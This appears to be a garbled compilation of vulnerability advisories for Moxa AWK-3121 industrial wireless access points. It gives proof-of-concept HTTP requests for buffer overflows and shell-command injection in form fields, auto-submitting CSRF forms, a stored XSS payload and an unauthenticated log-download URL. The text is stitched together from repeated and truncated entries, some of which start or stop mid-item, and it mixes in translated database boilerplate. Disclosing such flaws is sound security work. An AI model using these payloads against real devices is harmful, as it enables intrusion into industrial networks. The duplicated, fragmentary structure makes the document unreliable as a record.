------------------------------------------ [Reference] https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm ------------------------------------------ [Discoverer] Samuel Huntley 14. It provides functionality so that an administrator can run scripts on the device to troubleshoot any issues. The POST parameter "iw_serverip" is susceptible to buffer overflow. ------------------------------------------ [Additional Information] POC POST /forms/web_runScript HTTP/1.1 Cookie: Password508=c629f1b9d18c3d751da6d7b1fd43e628 ... 7e21a62f2905ca Content-Disposition: form-data; name="iw_filename"; filename="XXXX" Content-Type: application/octet-stream ls -ltr ... 7e21a62f2905ca Content-Disposition: form-data; name="iw_storage" tftp ... 7e21a62f2905ca Content-Disposition: form-data; name="iw_serverip" AAAAAAAAAAAAAAAAAA (etc.) ... 7e21a62f2905ca Content-Disposition: form-data; name="bkpath" /Troubleshooting.asp ... 7e21a62f2905ca-- ------------------------------------------ [Vulnerability Type] Buffer Overflow ------------------------------------------ [Vendor of Product] Moxa ------------------------------------------ [Affected Product Code Base] AWK-3121 - 1.14 ------------------------------------------ [Affected Component] Web Server -- iw_webs (Goahead) ------------------------------------------ [Attack Type] Remote ------------------------------------------ [Impact Code execution] true ------------------------------------------ [Impact Information Disclosure] true ------------------------------------------ [Attack Vectors] Use XSRF form to trick an admin into submitting the request and execute the buffer overflow ------------------------------------------ [Reference] https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm ------------------------------------------ [Discoverer] Samuel Huntley

An issue was discovered on Moxa AWK-3121 1.14 devices. The device by default allows HTTP traffic thus providing an insecure communication mechanism for a user connecting to the web server. This allows an attacker to sniff the traffic easily and allows an attacker to compromise sensitive data such as credentials. Moxa AWK-3121 The device contains vulnerabilities related to certificate and password management.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. MoxaAWK-3121 is an industrial-grade wireless access point for Moxa Corporation of Taiwan, China. An information disclosure vulnerability exists in Moxa's AWK-31211.14 release. ------------------------------------------ [VulnerabilityType Other] HTTP traffic by default ------------------------------------------ [Vendor of Product] Moxa ------------------------------------------ [Affected Product Code Base] AWK-3121 - 1.14 ------------------------------------------ [Affected Component] Web Server -- iw_webs (Goahead) ------------------------------------------ [Attack Type] Remote ------------------------------------------ [Impact Information Disclosure] true ------------------------------------------ [Attack Vectors] An attacker can sniff the HTTP traffic passing between the user and the device by using a MITM attack such as ARP poisoning. ------------------------------------------ [Reference] https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm ------------------------------------------ [Discoverer] Samuel Huntley 2. It is intended that an administrator can download /systemlog.log (the system log). However, the same functionality allows an attacker to download the file without any authentication or authorization. ------------------------------------------ [Additional Information] POC http://192.168.127.253//systemlog.log ------------------------------------------ [Vulnerability Type] Incorrect Access Control ------------------------------------------ [Vendor of Product] Moxa ------------------------------------------ [Affected Product Code Base] AWK-3121 - 1.14 ------------------------------------------ [Affected Component] Web Server -- iw_webs (Goahead) ------------------------------------------ [Attack Type] Remote ------------------------------------------ [Impact Information Disclosure] true ------------------------------------------ [Attack Vectors] An attacker can navigate to URL and download the systemlog file without any authentication or authorization ------------------------------------------ [Reference] https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm ------------------------------------------ [Discoverer] Samuel Huntley 3. The session cookie "Password508" does not have an HttpOnly flag. ------------------------------------------ [VulnerabilityType Other] Missing HttpOnly flag on session cookie ------------------------------------------ [Vendor of Product] Moxa ------------------------------------------ [Affected Product Code Base] AWK-3121 - 1.14 ------------------------------------------ [Affected Component] Web Server -- iw_webs (Goahead) ------------------------------------------ [Attack Type] Remote ------------------------------------------ [Impact Information Disclosure] true ------------------------------------------ [Attack Vectors] An attacker can use cross-site scripting attack to access the session cookie "Password508" which can allow an attacker to login into the device. ------------------------------------------ [Reference] https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm ------------------------------------------ [Discoverer] Samuel Huntley 4. It provides ping functionality so that an administrator can execute ICMP calls to check if the network is working correctly. However, the same functionality allows an attacker to execute commands on the device. The POST parameter "srvName" is susceptible to a buffer overflow. By crafting a packet that contains a string of 516 characters, it is possible for an attacker to execute the attack. ------------------------------------------ [Additional Information] POC POST /forms/webSetPingTrace HTTP/1.1 Cookie: Password508=6d86219d9cca208c1085cce81fdd31f0 srvName=AAAAAA (etc.) EEEEEE&option=0&bkpath=%2Fping_trace.asp ------------------------------------------ [Vulnerability Type] Buffer Overflow ------------------------------------------ [Vendor of Product] Moxa ------------------------------------------ [Affected Product Code Base] AWK-3121 - 1.14 ------------------------------------------ [Affected Component] Web Server -- iw_webs (Goahead) ------------------------------------------ [Attack Type] Remote ------------------------------------------ [Impact Code execution] true ------------------------------------------ [Attack Vectors] Use XSRF form to trick an admin into submitting the request and execute a buffer overflow on the device ------------------------------------------ [Reference] https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm ------------------------------------------ [Discoverer] Samuel Huntley 5. The device provides a Wi-Fi connection that is open and does not use any encryption mechanism by default. An administrator who uses the open wireless connection to set up the device can allow an attacker to sniff the traffic passing between the user's computer and the device. Also an attacker can MITM the response and infect a user's computer very easily as well. ------------------------------------------ [VulnerabilityType Other] Open WiFi Connection ------------------------------------------ [Vendor of Product] Moxa ------------------------------------------ [Affected Product Code Base] AWK 3121 - 1.14 ------------------------------------------ [Affected Component] Device ------------------------------------------ [Attack Type] Remote ------------------------------------------ [Impact Information Disclosure] true ------------------------------------------ [Attack Vectors] An attacker can monitor the Wifi channels using Kismet or some other opensource software and an wireless card in monitor mode and sniff all the traffic including HTTP traffic as well as SSH and Telnet traffic. ------------------------------------------ [Reference] https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm ------------------------------------------ [Discoverer] Samuel Huntley 6. It provides alert functionality so that an administrator can send emails to his/her account when there are changes to the device's network. However, the same functionality allows an attacker to execute commands on the device. The POST parameters "to1,to2,to3,to4" are all susceptible to buffer overflow. By crafting a packet that contains a string of 678 characters, it is possible for an attacker to execute the attack. ------------------------------------------ [Additional Information] POC POST /forms/web_SendTestEmail HTTP/1.1 Cookie: Password508=fab7f1d1efa604721aa70cf5a1ad163f server=server.mail.com&username=test&password=test&from=test@mail.com&to1=AAAAAAAAAA (etc.) ------------------------------------------ [Vulnerability Type] Buffer Overflow ------------------------------------------ [Vendor of Product] Moxa ------------------------------------------ [Affected Product Code Base] AWK 3121 - 1.14 ------------------------------------------ [Affected Component] Web Server -- iw_webs (Goahead) ------------------------------------------ [Attack Type] Remote ------------------------------------------ [Impact Code execution] true ------------------------------------------ [Attack Vectors] Use XSRF form to trick an admin into submitting the request and execute the buffer overflow ------------------------------------------ [Reference] https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm ------------------------------------------ [Discoverer] Samuel Huntley 7. The device provides a web interface to allow an administrator to manage the device. However, this interface is not protected against CSRF attacks, which allows an attacker to trick an administrator into executing actions without his/her knowledge, as demonstrated by the forms/iw_webSetParameters and forms/webSetMainRestart URIs. ------------------------------------------ [Additional Information] POC to change name of the device <html <body <form id="f" action="http://192.168.127.253/forms/iw_webSetParameters" method="POST" enctype="application/x-www-form-urlencoded" <input type="hidden" name="iw_board_deviceName" value="AWK-ROMEO" / <input type="hidden" name="iw_board_deviceLocation" value="" / <input type="hidden" name="iw_board_deviceDescription" value="" / <input type="hidden" name="iw_board_deviceContactInfo" value="" / <input type="hidden" name="Submit" value="Submit" / <input type="hidden" name="bkpath" value="/sysinfo.asp " / </form <script setTimeout("document.forms['f'].submit();",1); </script </body </html <html <body <form id="f" action="http://192.168.127.253/forms/webSetMainRestart" method="GET" enctype="application/x-www-form-urlencoded" <input type="hidden" name="SaveValue" value="1" / </form <script setTimeout("document.forms['f'].submit();",1); </script </body </html ------------------------------------------ [Vulnerability Type] Cross Site Request Forgery (CSRF) ------------------------------------------ [Vendor of Product] Moxa ------------------------------------------ [Affected Product Code Base] AWK-3121 - 1.14 ------------------------------------------ [Affected Component] Web Server -- iw_webs (Goahead) ------------------------------------------ [Attack Type] Remote ------------------------------------------ [Impact Code execution] true ------------------------------------------ [Impact Escalation of Privileges] true ------------------------------------------ [Impact Information Disclosure] true ------------------------------------------ [Attack Vectors] An attacker can trick an administrator of the device to visit an attacker controlled page while connected to the network and thus trick to change the password or any other setting ------------------------------------------ [Reference] https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm ------------------------------------------ [Discoverer] Samuel Huntley 8. The Moxa AWK 3121 provides ping functionality so that an administrator can execute ICMP calls to check if the network is working correctly. However, the same functionality allows an attacker to execute commands on the device. The POST parameter "srvName" is susceptible to this injection. By crafting a packet that contains shell metacharacters, it is possible for an attacker to execute the attack. ------------------------------------------ [Additional Information] POC POST /forms/webSetPingTrace HTTP/1.1 Cookie: Password508=e07f98b965bcc5abfe11c9c763b2d333 srvName=192.168.127.102;ping -c 8 192.168.127.101;##&option=0&bkpath=%2Fping_trace.asp ------------------------------------------ [VulnerabilityType Other] Command injection in Ping functionality ------------------------------------------ [Vendor of Product] Moxa ------------------------------------------ [Affected Product Code Base] AWK 3121 - 1.14 ------------------------------------------ [Affected Component] Web Server -- iw_webs (Goahead) ------------------------------------------ [Attack Type] Remote ------------------------------------------ [Impact Code execution] true ------------------------------------------ [Attack Vectors] Use XSRF form to trick an admin into submitting the request ------------------------------------------ [Reference] https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm ------------------------------------------ [Discoverer] Samuel Huntley 9. The device enables an unencrypted TELNET service by default. Also an attacker can easily connect to the TELNET daemon using the default credentials if they have not been changed by the user. ------------------------------------------ [VulnerabilityType Other] Insecure service Telnet enabled by default ------------------------------------------ [Vendor of Product] Moxa ------------------------------------------ [Affected Product Code Base] AWK-3121 - 1.14 ------------------------------------------ [Affected Component] Telnet daemon ------------------------------------------ [Attack Type] Remote ------------------------------------------ [Impact Code execution] true ------------------------------------------ [Impact Information Disclosure] true ------------------------------------------ [Attack Vectors] An attacker can sniff the traffic passing between the device and user by using a MITM attack such as ARP poisoning ------------------------------------------ [Reference] https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm ------------------------------------------ [Discoverer] Samuel Huntley 10. The Moxa AWK 3121 provides certfile upload functionality so that an administrator can upload a certificate file used for connecting to the wireless network. However, the same functionality allows an attacker to execute commands on the device. The POST parameter "iw_privatePass" is susceptible to this injection. By crafting a packet that contains shell metacharacters, it is possible for an attacker to execute the attack. ------------------------------------------ [Additional Information] POC POST /forms/web_certUpload HTTP/1.1 Cookie: Password508=68abf30ef8176a4248320929e04df562 ... 114782935826962 Content-Disposition: form-data; name="iw_privatePass" ;`ping -c 9 192.168.127.103` ## ... 114782935826962 Content-Disposition: form-data; name="bkpath" /wireless_cert.asp?index=1 ... 114782935826962 Content-Disposition: form-data; name="certSection" certWlan ... 114782935826962 Content-Disposition: form-data; name="rfindex" 0 ... 114782935826962 Content-Disposition: form-data; name="Submit" Submit ... 114782935826962 Content-Disposition: form-data; name="certFile1" test.txt ... 114782935826962 Content-Disposition: form-data; name="certFile"; filename="blob" Content-Type: text/xml <a id="a"<b id="b"hey!</b</a ... 114782935826962-- ------------------------------------------ [VulnerabilityType Other] Command injection in file upload ------------------------------------------ [Vendor of Product] Moxa ------------------------------------------ [Affected Product Code Base] AWK-3121 - 1.14 ------------------------------------------ [Affected Component] Web Server -- iw_webs (Goahead) ------------------------------------------ [Attack Type] Remote ------------------------------------------ [Impact Code execution] true ------------------------------------------ [Attack Vectors] Use XSRF form to trick an admin into submitting the request ------------------------------------------ [Reference] https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm ------------------------------------------ [Discoverer] Samuel Huntley 11. It provides functionality so that an administrator can change the name of the device. However, the same functionality allows an attacker to execute XSS by injecting an XSS payload. The POST parameter "iw_board_deviceName" is susceptible to this injection. ------------------------------------------ [Additional Information] POC <html <body <form id="f" action="http://192.168.127.253/forms/iw_webSetParameters" method="POST" enctype="application/x-www-form-urlencoded" <input type="hidden" name="iw_board_deviceName" value="AWK<\/td');alert(1);//" / <input type="hidden" name="iw_board_deviceLocation" value="" / <input type="hidden" name="iw_board_deviceDescription" value="" / <input type="hidden" name="iw_board_deviceContactInfo" value="" / <input type="hidden" name="Submit" value="Submit" / <input type="hidden" name="bkpath" value="/sysinfo.asp " / </form <script setTimeout("document.forms['f'].submit();",1); </script </body </html ------------------------------------------ [Vulnerability Type] Cross Site Scripting (XSS) ------------------------------------------ [Vendor of Product] Moxa ------------------------------------------ [Affected Product Code Base] AWK-3121 - 1.9 ------------------------------------------ [Affected Component] Web Server -- iw_webs (Goahead) ------------------------------------------ [Attack Type] Remote ------------------------------------------ [Impact Code execution] true ------------------------------------------ [Impact Escalation of Privileges] true ------------------------------------------ [Impact Information Disclosure] true ------------------------------------------ [Attack Vectors] Use XSRF form to trick an admin into submitting the request and execute a stored XSS on the device. ------------------------------------------ [Reference] https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm ------------------------------------------ [Discoverer] Samuel Huntley 12. It provides functionality so that an administrator can run scripts on the device to troubleshoot any issues. However, the same functionality allows an attacker to execute commands on the device. The POST parameter "iw_filename" is susceptible to buffer overflow. By crafting a packet that contains a string of 162 characters, it is possible for an attacker to execute the attack. ------------------------------------------ [Additional Information] POC POST /forms/web_runScript HTTP/1.1 Cookie: Password508=071b1093656adca3510d5e32f69737ec ... 7e21a62f2905ca Content-Disposition: form-data; name="iw_filename"; filename="AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBCCCC" Content-Type: application/octet-stream ls -ltr ... 7e21a62f2905ca Content-Disposition: form-data; name="iw_storage" tftp ... 7e21a62f2905ca Content-Disposition: form-data; name="iw_serverip" `ping -c 3 192.168.127.101` ... 7e21a62f2905ca Content-Disposition: form-data; name="bkpath" /Troubleshooting.asp ... 7e21a62f2905ca-- ------------------------------------------ [Vulnerability Type] Buffer Overflow ------------------------------------------ [Vendor of Product] Moxa ------------------------------------------ [Affected Product Code Base] AWK-3121 - 1.14 ------------------------------------------ [Affected Component] Web Server -- iw_webs (Goahead) ------------------------------------------ [Attack Type] Remote ------------------------------------------ [Impact Code execution] true ------------------------------------------ [Attack Vectors] Use XSRF form to trick an admin into submitting the request and execute buffer overflow ------------------------------------------ [Reference] https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm ------------------------------------------ [Discoverer] Samuel Huntley 13. It provides functionality so that an administrator can run scripts on the device to troubleshoot any issues. However, the same functionality allows an attacker to execute commands on the device. The POST parameter "iw_filename" is susceptible to command injection via shell metacharacters. ------------------------------------------ [Additional Information] POC <html <body <script function submitRequest() { var formData = new FormData(); formData.append("iw_filename", ";`ping -c 9 192.168.127.103` ##"); formData.append("iw_storage", "tftp"); formData.append("iw_serverip", "192.168.1.101"); formData.append("bkpath", "/wireless_cert.asp?index=1"); // HTML file input, chosen by user formData.append("certFile1", "test.txt"); // JavaScript file-like object var content = '<a id="a"<b id="b"hey!</b</a'; // the body of the new file... var blob = new Blob([content], { type: "text/xml"}); formData.append("certFile", blob); var request = new XMLHttpRequest(); request.open("POST", "http://192.168.127.253/forms/web_certUpload"); request.send(formData); } </script <form action="#" <input type="submit" value="Submit request" onclick="submitRequest();" / </form </body </html ------------------------------------------ [VulnerabilityType Other] Command injection in web runscript functionality ------------------------------------------ [Vendor of Product] Moxa ------------------------------------------ [Affected Product Code Base] AWK-3121 - 1.14 ------------------------------------------ [Affected Component] Web Server -- iw_webs (Goahead) ------------------------------------------ [Attack Type] Remote ------------------------------------------ [Impact Code execution] true ------------------------------------------ [Attack Vectors] Use XSRF form to trick an admin into submitting the request ------------------------------------------ [Reference] https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm ------------------------------------------ [Discoverer] Samuel Huntley 14. It provides functionality so that an administrator can run scripts on the device to troubleshoot any issues. However, the same functionality allows an attacker to execute commands on the device. The POST parameter "iw_serverip" is susceptible to buffer overflow. By crafting a packet that contains a string of 480 characters, it is possible for an attacker to execute the attack. ------------------------------------------ [Additional Information] POC POST /forms/web_runScript HTTP/1.1 Cookie: Password508=c629f1b9d18c3d751da6d7b1fd43e628 ... 7e21a62f2905ca Content-Disposition: form-data; name="iw_filename"; filename="XXXX" Content-Type: application/octet-stream ls -ltr ... 7e21a62f2905ca Content-Disposition: form-data; name="iw_storage" tftp ... 7e21a62f2905ca Content-Disposition: form-data; name="iw_serverip" AAAAAAAAAAAAAAAAAA (etc.) ... 7e21a62f2905ca Content-Disposition: form-data; name="bkpath" /Troubleshooting.asp ... 7e21a62f2905ca-- ------------------------------------------ [Vulnerability Type] Buffer Overflow ------------------------------------------ [Vendor of Product] Moxa ------------------------------------------ [Affected Product Code Base] AWK-3121 - 1.14 ------------------------------------------ [Affected Component] Web Server -- iw_webs (Goahead) ------------------------------------------ [Attack Type] Remote ------------------------------------------ [Impact Code execution] true ------------------------------------------ [Impact Information Disclosure] true ------------------------------------------ [Attack Vectors] Use XSRF form to trick an admin into submitting the request and execute the buffer overflow ------------------------------------------ [Reference] https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm ------------------------------------------ [Discoverer] Samuel Huntley

An issue was discovered on Moxa AWK-3121 1.19 devices. It provides functionality so that an administrator can change the name of the device. However, the same functionality allows an attacker to execute XSS by injecting an XSS payload. The POST parameter "iw_board_deviceName" is susceptible to this injection. Moxa AWK-3121 The device contains a cross-site scripting vulnerability.The information may be obtained and the information may be falsified. Moxa AWK-3121 is an industrial-grade wireless access point produced by Moxa Corporation of Taiwan, China. The 'iw_board_deviceName' parameter in Moxa AWK-3121 version 1.19 has a cross-site scripting vulnerability. The vulnerability stems from the lack of correct validation of client data in WEB applications. An attacker could exploit this vulnerability to execute client code. The device by default allows HTTP traffic thus providing an insecure communication mechanism for a user connecting to the web server. This allows an attacker to sniff the traffic easily and allows an attacker to compromise sensitive data such as credentials. ------------------------------------------ [VulnerabilityType Other] HTTP traffic by default ------------------------------------------ [Vendor of Product] Moxa ------------------------------------------ [Affected Product Code Base] AWK-3121 - 1.14 ------------------------------------------ [Affected Component] Web Server -- iw_webs (Goahead) ------------------------------------------ [Attack Type] Remote ------------------------------------------ [Impact Information Disclosure] true ------------------------------------------ [Attack Vectors] An attacker can sniff the HTTP traffic passing between the user and the device by using a MITM attack such as ARP poisoning. ------------------------------------------ [Reference] https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm ------------------------------------------ [Discoverer] Samuel Huntley 2. It is intended that an administrator can download /systemlog.log (the system log). ------------------------------------------ [Additional Information] POC http://192.168.127.253//systemlog.log ------------------------------------------ [Vulnerability Type] Incorrect Access Control ------------------------------------------ [Vendor of Product] Moxa ------------------------------------------ [Affected Product Code Base] AWK-3121 - 1.14 ------------------------------------------ [Affected Component] Web Server -- iw_webs (Goahead) ------------------------------------------ [Attack Type] Remote ------------------------------------------ [Impact Information Disclosure] true ------------------------------------------ [Attack Vectors] An attacker can navigate to URL and download the systemlog file without any authentication or authorization ------------------------------------------ [Reference] https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm ------------------------------------------ [Discoverer] Samuel Huntley 3. The session cookie "Password508" does not have an HttpOnly flag. ------------------------------------------ [VulnerabilityType Other] Missing HttpOnly flag on session cookie ------------------------------------------ [Vendor of Product] Moxa ------------------------------------------ [Affected Product Code Base] AWK-3121 - 1.14 ------------------------------------------ [Affected Component] Web Server -- iw_webs (Goahead) ------------------------------------------ [Attack Type] Remote ------------------------------------------ [Impact Information Disclosure] true ------------------------------------------ [Attack Vectors] An attacker can use cross-site scripting attack to access the session cookie "Password508" which can allow an attacker to login into the device. ------------------------------------------ [Reference] https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm ------------------------------------------ [Discoverer] Samuel Huntley 4. It provides ping functionality so that an administrator can execute ICMP calls to check if the network is working correctly. By crafting a packet that contains a string of 516 characters, it is possible for an attacker to execute the attack. ------------------------------------------ [Additional Information] POC POST /forms/webSetPingTrace HTTP/1.1 Cookie: Password508=6d86219d9cca208c1085cce81fdd31f0 srvName=AAAAAA (etc.) EEEEEE&option=0&bkpath=%2Fping_trace.asp ------------------------------------------ [Vulnerability Type] Buffer Overflow ------------------------------------------ [Vendor of Product] Moxa ------------------------------------------ [Affected Product Code Base] AWK-3121 - 1.14 ------------------------------------------ [Affected Component] Web Server -- iw_webs (Goahead) ------------------------------------------ [Attack Type] Remote ------------------------------------------ [Impact Code execution] true ------------------------------------------ [Attack Vectors] Use XSRF form to trick an admin into submitting the request and execute a buffer overflow on the device ------------------------------------------ [Reference] https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm ------------------------------------------ [Discoverer] Samuel Huntley 5. The device provides a Wi-Fi connection that is open and does not use any encryption mechanism by default. An administrator who uses the open wireless connection to set up the device can allow an attacker to sniff the traffic passing between the user's computer and the device. This can allow an attacker to steal the credentials passing over the HTTP connection as well as TELNET traffic. Also an attacker can MITM the response and infect a user's computer very easily as well. ------------------------------------------ [VulnerabilityType Other] Open WiFi Connection ------------------------------------------ [Vendor of Product] Moxa ------------------------------------------ [Affected Product Code Base] AWK 3121 - 1.14 ------------------------------------------ [Affected Component] Device ------------------------------------------ [Attack Type] Remote ------------------------------------------ [Impact Information Disclosure] true ------------------------------------------ [Attack Vectors] An attacker can monitor the Wifi channels using Kismet or some other opensource software and an wireless card in monitor mode and sniff all the traffic including HTTP traffic as well as SSH and Telnet traffic. ------------------------------------------ [Reference] https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm ------------------------------------------ [Discoverer] Samuel Huntley 6. By crafting a packet that contains a string of 678 characters, it is possible for an attacker to execute the attack. ------------------------------------------ [Additional Information] POC POST /forms/web_SendTestEmail HTTP/1.1 Cookie: Password508=fab7f1d1efa604721aa70cf5a1ad163f server=server.mail.com&username=test&password=test&from=test@mail.com&to1=AAAAAAAAAA (etc.) ------------------------------------------ [Vulnerability Type] Buffer Overflow ------------------------------------------ [Vendor of Product] Moxa ------------------------------------------ [Affected Product Code Base] AWK 3121 - 1.14 ------------------------------------------ [Affected Component] Web Server -- iw_webs (Goahead) ------------------------------------------ [Attack Type] Remote ------------------------------------------ [Impact Code execution] true ------------------------------------------ [Attack Vectors] Use XSRF form to trick an admin into submitting the request and execute the buffer overflow ------------------------------------------ [Reference] https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm ------------------------------------------ [Discoverer] Samuel Huntley 7. However, this interface is not protected against CSRF attacks, which allows an attacker to trick an administrator into executing actions without his/her knowledge, as demonstrated by the forms/iw_webSetParameters and forms/webSetMainRestart URIs. ------------------------------------------ [Additional Information] POC to change name of the device <html <body <form id="f" action="http://192.168.127.253/forms/iw_webSetParameters" method="POST" enctype="application/x-www-form-urlencoded" <input type="hidden" name="iw_board_deviceName" value="AWK-ROMEO" / <input type="hidden" name="iw_board_deviceLocation" value="" / <input type="hidden" name="iw_board_deviceDescription" value="" / <input type="hidden" name="iw_board_deviceContactInfo" value="" / <input type="hidden" name="Submit" value="Submit" / <input type="hidden" name="bkpath" value="/sysinfo.asp " / </form <script setTimeout("document.forms['f'].submit();",1); </script </body </html <html <body <form id="f" action="http://192.168.127.253/forms/webSetMainRestart" method="GET" enctype="application/x-www-form-urlencoded" <input type="hidden" name="SaveValue" value="1" / </form <script setTimeout("document.forms['f'].submit();",1); </script </body </html ------------------------------------------ [Vulnerability Type] Cross Site Request Forgery (CSRF) ------------------------------------------ [Vendor of Product] Moxa ------------------------------------------ [Affected Product Code Base] AWK-3121 - 1.14 ------------------------------------------ [Affected Component] Web Server -- iw_webs (Goahead) ------------------------------------------ [Attack Type] Remote ------------------------------------------ [Impact Code execution] true ------------------------------------------ [Impact Escalation of Privileges] true ------------------------------------------ [Impact Information Disclosure] true ------------------------------------------ [Attack Vectors] An attacker can trick an administrator of the device to visit an attacker controlled page while connected to the network and thus trick to change the password or any other setting ------------------------------------------ [Reference] https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm ------------------------------------------ [Discoverer] Samuel Huntley 8. The Moxa AWK 3121 provides ping functionality so that an administrator can execute ICMP calls to check if the network is working correctly. By crafting a packet that contains shell metacharacters, it is possible for an attacker to execute the attack. ------------------------------------------ [Additional Information] POC POST /forms/webSetPingTrace HTTP/1.1 Cookie: Password508=e07f98b965bcc5abfe11c9c763b2d333 srvName=192.168.127.102;ping -c 8 192.168.127.101;##&option=0&bkpath=%2Fping_trace.asp ------------------------------------------ [VulnerabilityType Other] Command injection in Ping functionality ------------------------------------------ [Vendor of Product] Moxa ------------------------------------------ [Affected Product Code Base] AWK 3121 - 1.14 ------------------------------------------ [Affected Component] Web Server -- iw_webs (Goahead) ------------------------------------------ [Attack Type] Remote ------------------------------------------ [Impact Code execution] true ------------------------------------------ [Attack Vectors] Use XSRF form to trick an admin into submitting the request ------------------------------------------ [Reference] https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm ------------------------------------------ [Discoverer] Samuel Huntley 9. The device enables an unencrypted TELNET service by default. This allows an attacker who has been able to gain an MITM position to easily sniff the traffic between the device and the user. Also an attacker can easily connect to the TELNET daemon using the default credentials if they have not been changed by the user. ------------------------------------------ [VulnerabilityType Other] Insecure service Telnet enabled by default ------------------------------------------ [Vendor of Product] Moxa ------------------------------------------ [Affected Product Code Base] AWK-3121 - 1.14 ------------------------------------------ [Affected Component] Telnet daemon ------------------------------------------ [Attack Type] Remote ------------------------------------------ [Impact Code execution] true ------------------------------------------ [Impact Information Disclosure] true ------------------------------------------ [Attack Vectors] An attacker can sniff the traffic passing between the device and user by using a MITM attack such as ARP poisoning ------------------------------------------ [Reference] https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm ------------------------------------------ [Discoverer] Samuel Huntley 10. The Moxa AWK 3121 provides certfile upload functionality so that an administrator can upload a certificate file used for connecting to the wireless network. By crafting a packet that contains shell metacharacters, it is possible for an attacker to execute the attack. ------------------------------------------ [Additional Information] POC POST /forms/web_certUpload HTTP/1.1 Cookie: Password508=68abf30ef8176a4248320929e04df562 ... 114782935826962 Content-Disposition: form-data; name="iw_privatePass" ;`ping -c 9 192.168.127.103` ## ... 114782935826962 Content-Disposition: form-data; name="bkpath" /wireless_cert.asp?index=1 ... 114782935826962 Content-Disposition: form-data; name="certSection" certWlan ... 114782935826962 Content-Disposition: form-data; name="rfindex" 0 ... 114782935826962 Content-Disposition: form-data; name="Submit" Submit ... 114782935826962 Content-Disposition: form-data; name="certFile1" test.txt ... 114782935826962 Content-Disposition: form-data; name="certFile"; filename="blob" Content-Type: text/xml <a id="a"<b id="b"hey!</b</a ... 114782935826962-- ------------------------------------------ [VulnerabilityType Other] Command injection in file upload ------------------------------------------ [Vendor of Product] Moxa ------------------------------------------ [Affected Product Code Base] AWK-3121 - 1.14 ------------------------------------------ [Affected Component] Web Server -- iw_webs (Goahead) ------------------------------------------ [Attack Type] Remote ------------------------------------------ [Impact Code execution] true ------------------------------------------ [Attack Vectors] Use XSRF form to trick an admin into submitting the request ------------------------------------------ [Reference] https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm ------------------------------------------ [Discoverer] Samuel Huntley 11. ------------------------------------------ [Additional Information] POC <html <body <form id="f" action="http://192.168.127.253/forms/iw_webSetParameters" method="POST" enctype="application/x-www-form-urlencoded" <input type="hidden" name="iw_board_deviceName" value="AWK<\/td');alert(1);//" / <input type="hidden" name="iw_board_deviceLocation" value="" / <input type="hidden" name="iw_board_deviceDescription" value="" / <input type="hidden" name="iw_board_deviceContactInfo" value="" / <input type="hidden" name="Submit" value="Submit" / <input type="hidden" name="bkpath" value="/sysinfo.asp " / </form <script setTimeout("document.forms['f'].submit();",1); </script </body </html ------------------------------------------ [Vulnerability Type] Cross Site Scripting (XSS) ------------------------------------------ [Vendor of Product] Moxa ------------------------------------------ [Affected Product Code Base] AWK-3121 - 1.9 ------------------------------------------ [Affected Component] Web Server -- iw_webs (Goahead) ------------------------------------------ [Attack Type] Remote ------------------------------------------ [Impact Code execution] true ------------------------------------------ [Impact Escalation of Privileges] true ------------------------------------------ [Impact Information Disclosure] true ------------------------------------------ [Attack Vectors] Use XSRF form to trick an admin into submitting the request and execute a stored XSS on the device. ------------------------------------------ [Reference] https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm ------------------------------------------ [Discoverer] Samuel Huntley 12. By crafting a packet that contains a string of 162 characters, it is possible for an attacker to execute the attack. ------------------------------------------ [Additional Information] POC POST /forms/web_runScript HTTP/1.1 Cookie: Password508=071b1093656adca3510d5e32f69737ec ... 7e21a62f2905ca Content-Disposition: form-data; name="iw_filename"; filename="AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBCCCC" Content-Type: application/octet-stream ls -ltr ... 7e21a62f2905ca Content-Disposition: form-data; name="iw_storage" tftp ... 7e21a62f2905ca Content-Disposition: form-data; name="iw_serverip" `ping -c 3 192.168.127.101` ... 7e21a62f2905ca Content-Disposition: form-data; name="bkpath" /Troubleshooting.asp ... 7e21a62f2905ca-- ------------------------------------------ [Vulnerability Type] Buffer Overflow ------------------------------------------ [Vendor of Product] Moxa ------------------------------------------ [Affected Product Code Base] AWK-3121 - 1.14 ------------------------------------------ [Affected Component] Web Server -- iw_webs (Goahead) ------------------------------------------ [Attack Type] Remote ------------------------------------------ [Impact Code execution] true ------------------------------------------ [Attack Vectors] Use XSRF form to trick an admin into submitting the request and execute buffer overflow ------------------------------------------ [Reference] https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm ------------------------------------------ [Discoverer] Samuel Huntley 13. 